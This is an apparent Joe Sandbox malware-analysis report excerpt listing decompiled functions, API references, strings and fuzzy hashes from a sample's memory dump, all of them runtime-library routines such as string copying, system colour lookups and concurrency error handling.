Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: d7db246c04f4046b305c290abbff40d4c3a4ce3aa6be225e4c37916f29fec9f5
Instruction ID: 25abcb6042ec69a86f6cba4507fa0b046a00133c2f95a83daf14c07d660c34b0
Opcode Fuzzy Hash: d7db246c04f4046b305c290abbff40d4c3a4ce3aa6be225e4c37916f29fec9f5
Instruction Fuzzy Hash: 3D1137B2741611BFE7198F61CC4ABE6FB68FF05712F10422EE65996280E7B079548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA517 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CAA5AB
_memmove.LIBCMT ref: 00CAA60B
_memmove.LIBCMT ref: 00CAA633
std::_Xinvalid_argument.LIBCPMT ref: 00CAA669

Strings

invalid string position, xrefs: 00CAA50C, 00CAA65A
string too long, xrefs: 00CAA502, 00CAA664

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: cbfc455236f8774d7e615ede8dcf0670fb70e2bcc77225ea794fdcf18ad5ace4
Instruction ID: 2a45a78f750441413ba48dff01603458bc2481f51097a659bb8ccefd476a0057
Opcode Fuzzy Hash: cbfc455236f8774d7e615ede8dcf0670fb70e2bcc77225ea794fdcf18ad5ace4
Instruction Fuzzy Hash: 2E51E031700606DFCF28CE5DD98496AB7BAEF86318B18492DF85297241C770ED42CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CA990D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA999C
_memmove.LIBCMT ref: 00CA99DF
_memmove.LIBCMT ref: 00CA9A09
std::_Xinvalid_argument.LIBCPMT ref: 00CA9A35

Strings

invalid string position, xrefs: 00CA9A3A
string too long, xrefs: 00CA9A30

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 706e15aea3575535d3af8e9033d2d8805273cf9d7a93c693413adaccfc86cd41
Instruction ID: de9cd3732db1edd5272868ec9d9faf0101219647572587c181265939f1ff85fa
Opcode Fuzzy Hash: 706e15aea3575535d3af8e9033d2d8805273cf9d7a93c693413adaccfc86cd41
Instruction Fuzzy Hash: 6041B771200316EFDF24CF28D88295B77B5EF46748B20492EE8569B341D771ED41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6594 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CA6594(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				intOrPtr _v44;
				signed int _v52;
				char _v88;
				char _v104;
				char _v128;
				char _v152;
				intOrPtr* _t23;
				void* _t24;
				intOrPtr _t36;
				intOrPtr* _t41;
				char* _t43;

				0xe21503(0x5c);
				_t23 =  *((intOrPtr*)( *__ecx + 0x34))();
				_t24 =  *((intOrPtr*)( *_t23 + 8))( &_v152);
				_v52 = _v52 & 0x00000000;
				_t41 =  &_v104;
				_v52 = 1;
				E00CA4197(_t41);
				_v104 = 0xe92cb4;
				0xe2143b( &_v104, 0xee8098, 0, E00CA2ED4(__ebx, _t23,  &_v128, _t24, ": this object doesn\'t support resynchronization"));
				asm("int3");
				0xe21503(0x44);
				 *((intOrPtr*)( *_t41 + 0x28))();
				E00CA1E2C( &_v88, "StreamTransformation: this object doesn\'t support random access");
				_v52 = _v52 & 0x00000000;
				_t43 =  &_v128;
				E00CA4197(_t43);
				_v128 = 0xe92cb4;
				0xe2143b( &_v128, 0xee8098, 0,  &_v88);
				asm("int3");
				_t36 = _v44;
				 *((intOrPtr*)(_t43 + 0xc)) = _t36;
				return _t36;
			}

0x00ca659b
0x00ca65a2
0x00ca65ad
0x00ca65b0
0x00ca65c9
0x00ca65cc
0x00ca65d0
0x00ca65dd
0x00ca65e5
0x00ca65ea
0x00ca65f2
0x00ca65f9
0x00ca6604
0x00ca6609
0x00ca6613
0x00ca6616
0x00ca6623
0x00ca662b
0x00ca6630
0x00ca6634
0x00ca6637
0x00ca663b

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA659B

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA65E5

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

__EH_prolog3_GS.LIBCMT ref: 00CA65F2
__CxxThrowException@8.LIBCMT ref: 00CA662B

Strings

: this object doesn't support resynchronization, xrefs: 00CA65B4
StreamTransformation: this object doesn't support random access, xrefs: 00CA65FC

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3_Throw$ExceptionH_prolog3Raise
String ID: : this object doesn't support resynchronization$StreamTransformation: this object doesn't support random access
API String ID: 999754459-3551788113
Opcode ID: ed06d459d653957b347c9e23837d0c1621b2e50bcba3d5a7e29c5ca782b84edb
Instruction ID: 0b2bd1ba8954d7b35e2e91774b8e6a6b70df4003c86c8c602ba39eac137b405b
Opcode Fuzzy Hash: ed06d459d653957b347c9e23837d0c1621b2e50bcba3d5a7e29c5ca782b84edb
Instruction Fuzzy Hash: A7114C70940308AFDF04EBE0D846FDDBBB8AF54315F501458F609BB291DBB09A48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D0E191 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D0E191(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t16;

				_t16 = __ecx;
				 *((intOrPtr*)(_t16 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t16 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t16 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t16 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t16 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t16 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t16 + 0x20) = _t14;
				return _t14;
			}

0x00d0e19b
0x00d0e1a1
0x00d0e1a8
0x00d0e1af
0x00d0e1b6
0x00d0e1c3
0x00d0e1ca
0x00d0e1cd
0x00d0e1cf
0x00d0e1d4

APIs

GetSysColor.USER32(0000000F), ref: 00D0E19D
GetSysColor.USER32(00000010), ref: 00D0E1A4
GetSysColor.USER32(00000014), ref: 00D0E1AB
GetSysColor.USER32(00000012), ref: 00D0E1B2
GetSysColor.USER32(00000006), ref: 00D0E1B9
GetSysColorBrush.USER32(0000000F), ref: 00D0E1C6
GetSysColorBrush.USER32(00000006), ref: 00D0E1CD

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 409c7a9710abc4f896a3c0117108d00dff3911dfab65fcfb5907a61f1cb8ea9c
Instruction ID: 87dbdb3a8037b3b1cf69ffbea6f7c4441a4a50ebba67971e99f80cbe5a5c7d3f
Opcode Fuzzy Hash: 409c7a9710abc4f896a3c0117108d00dff3911dfab65fcfb5907a61f1cb8ea9c
Instruction Fuzzy Hash: 05F01271E407297BD710AF729D097467E90FB44720F040527D2089BE80D7B6E460DFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7945E Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__malloc_crt.LIBCMT ref: 00E7947C
std::exception::exception.LIBCMT ref: 00E79496
__CxxThrowException@8.LIBCMT ref: 00E794CC
Concurrency::details::ContextBase::CancelCollection.LIBCMT ref: 00E794E8
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00E794F1

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Base::CancelConcurrency::details::Context$CollectionException@8StealersThrow__malloc_crtstd::exception::exception
String ID:
API String ID: 1697683264-0
Opcode ID: d6f43afbb0a763ba64b03f43ebcb20dc80d42ad079f57eb539f2216e9c521a99
Instruction ID: b9eccf4e6e75ddcdea392939cf55566bd4982f9022e06b52fd6a42280fea1652
Opcode Fuzzy Hash: d6f43afbb0a763ba64b03f43ebcb20dc80d42ad079f57eb539f2216e9c521a99
Instruction Fuzzy Hash: 4A01C471A4031C6ACB00EFA4E842ADE77FCDF40798F10E166F919BB241EB70DA458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7BA0 Relevance: 7.6, APIs: 5, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CA7BA0(void* __ebx, void* __eflags) {
				void* _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t64;
				void* _t65;
				intOrPtr _t70;
				intOrPtr _t78;
				void* _t81;
				intOrPtr _t82;
				intOrPtr* _t105;
				intOrPtr* _t107;
				void* _t108;
				void* _t111;
				void* _t116;

				_t111 = __eflags;
				_t81 = __ebx;
				0xe26748(0x340, 8);
				 *((intOrPtr*)(_t108 - 0x348)) =  *((intOrPtr*)(__ebx + 0x28));
				 *((intOrPtr*)(_t108 - 0x340)) =  *((intOrPtr*)(__ebx + 0x2c));
				_t82 = 0xf;
				 *((intOrPtr*)(_t108 - 4)) = 0;
				 *((char*)(_t108 - 0x339)) = 0;
				 *((intOrPtr*)(_t108 - 0x20)) = _t82;
				 *((intOrPtr*)(_t108 - 0x24)) = 0;
				 *((char*)(_t108 - 0x34)) = 0;
				 *((intOrPtr*)(_t108 - 0x38)) = _t82;
				 *((intOrPtr*)(_t108 - 0x3c)) = 0;
				 *((char*)(_t108 - 0x4c)) = 0;
				 *((char*)(_t108 - 4)) = 2;
				E00CA241A(_t108 - 0x4c, __ebx + 0x10, 0);
				 *((char*)(_t108 - 4)) = 3;
				_t60 = E00CA37AF(_t108 - 0x338, _t111);
				 *((char*)(_t108 - 4)) = 4;
				0xe4a905( *((intOrPtr*)(__ebx + 8)), 0x20,  *((intOrPtr*)(__ebx + 0xc)), 0xc, 0xffffffff);
				_t61 = E00D0BC90(_t60, 0x10);
				 *((intOrPtr*)(_t108 - 0x344)) = _t61;
				 *((char*)(_t108 - 4)) = 5;
				if(_t61 == 0) {
					_t62 = 0;
					__eflags = 0;
				} else {
					_t62 = E00CA38CD(_t61, _t108 - 0x34);
				}
				 *((char*)(_t108 - 4)) = 4;
				0xe4b97b(_t108 - 0x338, _t62, 0x10, 0xffffffff, 4);
				 *((char*)(_t108 - 4)) = 6;
				_t64 = E00D0BC90(_t108 - 0x338, 0x14);
				 *((intOrPtr*)(_t108 - 0x344)) = _t64;
				 *((char*)(_t108 - 4)) = 7;
				_t113 = _t64;
				if(_t64 == 0) {
					_t65 = 0;
					__eflags = 0;
				} else {
					_t65 = E00CA43F1(_t64, _t108 - 0x190, 3);
				}
				_push(_t65);
				_push(1);
				 *((char*)(_t108 - 4)) = 6;
				_push(_t108 - 0x4c);
				E00CA444E(_t108 - 0x84, _t113);
				E00CA4C1B(_t108 - 0x78);
				_t107 =  *((intOrPtr*)(_t108 - 0x340));
				 *((char*)(_t108 - 0x339)) =  *((intOrPtr*)(_t108 - 0xf8));
				_t70 =  *((intOrPtr*)(_t108 - 0x24));
				 *_t107 = _t70;
				if(_t70 != 0) {
					_t105 =  *((intOrPtr*)(_t108 - 0x348));
					if( *_t105 != 0) {
						0xe213f4( *_t105);
					}
					_t78 =  *_t107 + 1;
					0xe26445(_t78);
					 *_t105 = _t78;
					0xe23f30(_t78, 0,  *_t107 + 1);
					_t116 =  *((intOrPtr*)(_t108 - 0x20)) - 0x10;
					_t80 =  >=  ?  *((void*)(_t108 - 0x34)) : _t108 - 0x34;
					0xe219a0( *_t105,  >=  ?  *((void*)(_t108 - 0x34)) : _t108 - 0x34,  *_t107);
					 *((char*)(_t108 - 0x339)) = 1;
				}
				 *((char*)(_t108 - 4)) = 4;
				E00CA4C89(_t108 - 0x190, _t116);
				 *((char*)(_t108 - 4)) = 3;
				E00CA49AB(_t81, _t108 - 0x338, _t116);
				E00CA23D6(_t108 - 0x4c, 1, 0);
				E00CA23D6(_t108 - 0x34, 1, 0);
				E00CA23D6(_t81 + 0x10, 1, 0);
				0xe266b9();
				return  *((intOrPtr*)(_t108 - 0x339));
			}

0x00ca7ba0
0x00ca7ba0
0x00ca7bac
0x00ca7bba
0x00ca7bc3
0x00ca7bcd
0x00ca7bce
0x00ca7bd1
0x00ca7bd7
0x00ca7bda
0x00ca7bdd
0x00ca7be0
0x00ca7be3
0x00ca7be6
0x00ca7bef
0x00ca7bf7
0x00ca7c02
0x00ca7c06
0x00ca7c17
0x00ca7c1b
0x00ca7c22
0x00ca7c28
0x00ca7c2e
0x00ca7c34
0x00ca7c43
0x00ca7c43
0x00ca7c36
0x00ca7c3c
0x00ca7c3c
0x00ca7c52
0x00ca7c5d
0x00ca7c64
0x00ca7c68
0x00ca7c6e
0x00ca7c74
0x00ca7c78
0x00ca7c7a
0x00ca7c8e
0x00ca7c8e
0x00ca7c7c
0x00ca7c87
0x00ca7c87
0x00ca7c90
0x00ca7c91
0x00ca7c96
0x00ca7c9a
0x00ca7ca1
0x00ca7ca9
0x00ca7cb4
0x00ca7cba
0x00ca7cc0
0x00ca7cc3
0x00ca7cc7
0x00ca7cc9
0x00ca7cd2
0x00ca7cd6
0x00ca7cdb
0x00ca7cde
0x00ca7ce0
0x00ca7ce5
0x00ca7cee
0x00ca7cf3
0x00ca7cfc
0x00ca7d03
0x00ca7d0b
0x00ca7d0b
0x00ca7d18
0x00ca7d1c
0x00ca7d27
0x00ca7d2b
0x00ca7d61
0x00ca7d6d
0x00ca7d79
0x00ca7d87
0x00ca7d8c

APIs

__EH_prolog3_catch_GS_align.LIBCMT ref: 00CA7BAC

Part of subcall function 00CA37AF: __EH_prolog3.LIBCMT ref: 00CA37B6

Part of subcall function 00E4A905: __EH_prolog3.LIBCMT ref: 00E4A90C

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

_free.LIBCMT ref: 00CA7CD6
_malloc.LIBCMT ref: 00CA7CE0
_memset.LIBCMT ref: 00CA7CEE
_memmove.LIBCMT ref: 00CA7D03

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3_malloc$H_prolog3_catch_S_align_free_memmove_memset
String ID:
API String ID: 1072502553-0
Opcode ID: 50d375e69327be9ad655881cd737667f34bc6d07904474d5fbbca3a300c5a24e
Instruction ID: f8fe07f5921fb1ca294d6a9d0a2eb45ebc94bd3cc85849089f7a65a7f7cc5078
Opcode Fuzzy Hash: 50d375e69327be9ad655881cd737667f34bc6d07904474d5fbbca3a300c5a24e
Instruction Fuzzy Hash: ED51BB30905259EEEB26EF64DC51BDDBBB8AF19314F200199F549B72C2DBB05B40DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00E27EFD Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00E27F09

Part of subcall function 00E26445: __FF_MSGBANNER.LIBCMT ref: 00E2645C
Part of subcall function 00E26445: __NMSG_WRITE.LIBCMT ref: 00E26463
Part of subcall function 00E26445: RtlAllocateHeap.NTDLL(009C0000,00000000,00000001), ref: 00E26488

_free.LIBCMT ref: 00E27F1C

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 45b7f647a36497f87ea3ecfaa6d4be6c4cd192c65ba615a3c3ef53d2c4d8789b
Instruction ID: dbc8804ff0ed48737d50e8d07f9a003ab9c1e1b60b9201d362e0c7f61cf22cf6
Opcode Fuzzy Hash: 45b7f647a36497f87ea3ecfaa6d4be6c4cd192c65ba615a3c3ef53d2c4d8789b
Instruction Fuzzy Hash: 5811733260C23AAFEB212F74BD05B9A36E5AF043A4F207525F99DB6191DF359C409690

Uniqueness

Uniqueness Score: -1.00%

Function 00E6803D Relevance: 7.6, APIs: 5, Instructions: 52registrythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(00000000,?,00000000,00E78102,000000FF,0000000C), ref: 00E68054
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,00E6DB7C,?,?,?,?,?,00E66FB3,000000FF,?), ref: 00E6805E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E6807D
__CxxThrowException@8.LIBCMT ref: 00E6808B
SetThreadAffinityMask.KERNEL32(?,?), ref: 00E680BE

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AffinityConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastMaskObjectRegisterSingleThreadThrowWait
String ID:
API String ID: 2773543435-0
Opcode ID: 7291b921bb10760a55c64a3c63caea74c39b662e4fd4d3a4959158f2dcfd5150
Instruction ID: 82e1df6ada21221343eb35de4af480dc5af41d7b27ccc4d9f7d706941754aac8
Opcode Fuzzy Hash: 7291b921bb10760a55c64a3c63caea74c39b662e4fd4d3a4959158f2dcfd5150
Instruction Fuzzy Hash: 6C019E31540109FFDF11EFA0ED05AAD3BA9EB04390F209660BA29F51A1DA32DA14AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E715 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E6812C: TlsAlloc.KERNEL32(?,?,?), ref: 00E68132
Part of subcall function 00E6812C: GetLastError.KERNEL32 ref: 00E6813D
Part of subcall function 00E6812C: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E68159
Part of subcall function 00E6812C: __CxxThrowException@8.LIBCMT ref: 00E68167
Part of subcall function 00E6812C: TlsFree.KERNEL32(?,?,?,00EFA47C,00000000), ref: 00E68173

TlsAlloc.KERNEL32(?,?,?), ref: 00E784A6
GetLastError.KERNEL32 ref: 00E784B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E784D2
__CxxThrowException@8.LIBCMT ref: 00E784E0
TlsFree.KERNEL32(?,00EFA47C,00000000), ref: 00E784EC

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8FreeLastThrow
String ID:
API String ID: 3166510937-0
Opcode ID: e53117385a6d7849d9ad1bc01d294c2379dfcc8940d3a92667d3a1299dac5f5f
Instruction ID: 09cbc4a41bef8b8eb007cc8cc19908ffba13aae9652811046c177dfc6212f06b
Opcode Fuzzy Hash: e53117385a6d7849d9ad1bc01d294c2379dfcc8940d3a92667d3a1299dac5f5f
Instruction Fuzzy Hash: 2EF0B43044025A9BCB00FB71FD0EAB937ACBB00310B50EA64B53DF11A1EF748104AB56

Uniqueness

Uniqueness Score: -1.00%

Function 00E68189 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,76688560,?,?,?,?,00E66FB3,000000FF,?), ref: 00E68195
GetLastError.KERNEL32(?,?,?,?,00E66FB3,000000FF,?,?,?,?,00E665C6,?,?,00F13138), ref: 00E6819F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E681BB
__CxxThrowException@8.LIBCMT ref: 00E681C9
UnregisterWait.KERNEL32(?), ref: 00E681D5

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowUnregisterValueWait
String ID:
API String ID: 4170064228-0
Opcode ID: 57f87a635d1128ec633aa0fe6da011c203609c1f9ec28981d68831078d3bbdb4
Instruction ID: d1095dd496305108921396cec39035279cbe2ab5dc24b85b0591861019c790a0
Opcode Fuzzy Hash: 57f87a635d1128ec633aa0fe6da011c203609c1f9ec28981d68831078d3bbdb4
Instruction Fuzzy Hash: 11F0A03014020DABCB00BBA2FD09ABE3BACAB00380B505661B91CA1161EF3195149792

Uniqueness

Uniqueness Score: -1.00%

Function 00E6812C Relevance: 7.5, APIs: 5, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?), ref: 00E68132
GetLastError.KERNEL32 ref: 00E6813D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E68159
__CxxThrowException@8.LIBCMT ref: 00E68167
TlsFree.KERNEL32(?,?,?,00EFA47C,00000000), ref: 00E68173

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
